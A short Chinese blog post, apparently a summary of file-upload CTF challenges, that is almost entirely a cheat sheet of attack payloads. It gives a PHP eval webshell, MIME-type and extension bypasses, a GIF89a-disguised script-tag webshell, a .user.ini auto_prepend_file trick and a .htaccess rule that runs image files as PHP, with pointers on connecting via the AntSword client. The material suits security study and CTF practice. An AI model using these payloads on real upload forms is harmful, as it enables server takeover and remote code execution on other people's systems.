第1-63题总结:文件上传篇

Posted 想学习安全的小白

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了第1-63题总结:文件上传篇相关的知识,希望对你有一定的参考价值。

  1. 一句话木马:<?php @eval($_POST['pass']);?>
  2. Content-Type:image/png保持
  3. 后缀名绕过:phtml
  4. 添加图片前缀绕过内容检测:GIF89a? <script language="php">eval($_REQUEST[pass])</script>
  5. 利用.user.ini文件:GIF89a auto_prepend_file=pass.png,让可以访问的index.php加载一句话木马的图片格式,蚁剑连接index.php,eg:第二十三题
  6. .htaccess文件内容:将包含pass文件名的文件以php文件进行解析,蚁剑连接pass.png
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>

以上是关于第1-63题总结:文件上传篇的主要内容,如果未能解决你的问题,请参考以下文章